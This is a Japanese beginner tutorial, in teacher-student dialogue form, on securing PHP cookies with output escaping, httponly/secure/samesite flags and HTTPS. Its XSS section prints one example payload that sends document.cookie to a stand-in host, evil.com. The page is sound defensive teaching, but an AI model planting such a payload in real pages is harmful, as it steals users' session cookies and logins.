カテゴリ: PHP 更新日: 2026/02/08

PHPのCookieセキュリティ対策をやさしく解説!XSSとHTTPSで安全にログイン情報を守る方法

PHP の Cookie のセキュリティ対策(XSS 対策、HTTPS 利用)
PHP の Cookie のセキュリティ対策(XSS 対策、HTTPS 利用)

先生と生徒の会話形式で理解しよう

生徒

「先生、PHPでログインしたユーザー情報を保存するのにCookieって使えるんですか?」

先生

「はい、Cookie(クッキー)はユーザーのブラウザに情報を保存する仕組みで、ログイン状態の維持などに使えますよ。」

生徒

「でも、セキュリティが心配です。安全に使う方法ってありますか?」

先生

「あります!PHPでCookieを安全に使うためには、XSS対策とHTTPSの利用がとても大切です。これから一緒に学んでいきましょう。」

1. Cookieとは?PHPでの使い方と基本の仕組み

1. Cookieとは?PHPでの使い方と基本の仕組み
1. Cookieとは?PHPでの使い方と基本の仕組み

Cookie(クッキー)は、Webサイトがユーザーのブラウザに一時的な情報を保存するための機能です。たとえば、ログイン状態を維持したり、買い物かごの中身を記憶するのに使われます。

PHPでは、setcookie()という関数を使ってCookieを設定できます。

例:


setcookie("user", "Taro", time() + 3600);

このコードは「user」という名前で「Taro」という値を持つCookieを、1時間(3600秒)ブラウザに保存します。

2. Cookieを使うときのセキュリティリスクとは?

2. Cookieを使うときのセキュリティリスクとは?
2. Cookieを使うときのセキュリティリスクとは?

Cookieは便利ですが、セキュリティ上の注意点があります。特に以下の2つは重要です。

  • XSS(クロスサイトスクリプティング)攻撃
  • HTTPSを使っていないと情報が盗まれる危険

順番に見ていきましょう。

3. XSS(クロスサイトスクリプティング)とは?

3. XSS(クロスサイトスクリプティング)とは?
3. XSS(クロスサイトスクリプティング)とは?

XSSとは、悪意のあるスクリプト(JavaScriptなど)をWebページに埋め込まれる攻撃のことです。攻撃者はこの方法でCookieの情報を盗むことができます。

たとえば、掲示板などに以下のような危険なコードが書き込まれていた場合:


<script>document.location='http://evil.com/steal.php?cookie='+document.cookie;</script>

このスクリプトが実行されると、あなたのブラウザに保存されたCookieが悪意のあるサイトに送信されてしまいます。

4. PHPでできるXSS対策方法

4. PHPでできるXSS対策方法
4. PHPでできるXSS対策方法

XSSを防ぐには、ユーザーが入力した文字列をそのまま表示しないことが重要です。PHPではhtmlspecialchars()を使って、入力内容を無害化できます。

例:


echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

この関数は、<>などの記号を別の形式に変換して、スクリプトが実行されないようにします。

5. Cookieのセキュリティオプションを設定しよう

5. Cookieのセキュリティオプションを設定しよう
5. Cookieのセキュリティオプションを設定しよう

PHPのCookieには、セキュリティを高めるためのオプションがいくつかあります。

  • httponly:JavaScriptからCookieを読み取れなくする
  • secure:HTTPS通信のときだけCookieを送る
  • samesite:他のサイトからの不正アクセスを防ぐ

これらを設定した安全なCookieの例は次の通りです。


setcookie("user", "Taro", [
    'expires' => time() + 3600,
    'path' => '/',
    'secure' => true,
    'httponly' => true,
    'samesite' => 'Strict'
]);

この設定により、CookieはHTTPSでしか送信されず、JavaScriptでも読み取れず、他サイトからのリクエストもブロックされます。

6. HTTPSってなに?なぜPHPのCookieに必要なの?

6. HTTPSってなに?なぜPHPのCookieに必要なの?
6. HTTPSってなに?なぜPHPのCookieに必要なの?

HTTPS(エイチティーティーピーエス)は、Webページの通信を暗号化して安全にする仕組みです。URLが「https://」で始まるサイトがそれです。

HTTPSを使わないと、Cookieの情報が盗聴される危険があります。特にログイン情報などを扱うサイトでは必ず使うようにしましょう。

HTTPSを使っていれば、セキュリティオプションsecureを有効にできます。

7. 初心者向け!セキュリティ対策のチェックリスト

7. 初心者向け!セキュリティ対策のチェックリスト
7. 初心者向け!セキュリティ対策のチェックリスト

初心者でも忘れないように、PHPでCookieを使うときのポイントをまとめます:

  • ユーザーの入力は必ずhtmlspecialchars()で処理する
  • Cookieはhttponlysecureを設定する
  • Webサイトは必ずHTTPSにする
  • samesiteオプションで外部からの攻撃を防ぐ

これらの対策をすれば、PHPでCookieを使っても安全にWebアプリケーションを運用できます。

コメント
コメント投稿は、ログインしてください

まだ口コミはありません。

関連記事:
カテゴリの一覧へ
新着記事
New1
Python
PythonでPostgreSQLを操作する方法!psycopg2の基本と実践を初心者向けに解説
New2
Python
Pythonで2次元リストを作成・操作する方法(リストのリスト)
New3
Python
PythonでHello World!最初のプログラムを作ってみよう【初心者向け完全ガイド】
New4
PHP
PHP の DateTime クラスの基本的な使い方を完全解説!初心者でもわかる日付と時間の操作
人気記事
No.1
Java&Spring記事人気No1
Python
Pythonのloggingモジュール入門!初心者でもできるエラーログの記録方法をやさしく解説
No.2
Java&Spring記事人気No2
Python
PythonのMixin(ミックスイン)を完全ガイド!初心者でもわかるクラス再利用の基本
No.3
Java&Spring記事人気No3
Python
Pythonでリストを分割する方法(スライス / split() / itertools)
No.4
Java&Spring記事人気No4
Python
Pythonのコンストラクタ(__init__)の使い方!初心者でもわかるオブジェクトの初期化
No.5
Java&Spring記事人気No5
PHP
PHP のフォームデータの受け取り($_POST, $_GET)を完全解説!初心者向けガイド
No.6
Java&Spring記事人気No6
Python
PythonでISO 8601形式の日時に変換する方法を完全解説!初心者でもわかる時間フォーマットの基本
No.7
Java&Spring記事人気No7
Python
Pythonで辞書の値を集計する方法(Counter / groupbyの活用)初心者向け完全ガイド
No.8
Java&Spring記事人気No8
Python
Pythonのコンストラクタ(__init__)の使い方を解説!初心者でもわかるオブジェクトの初期化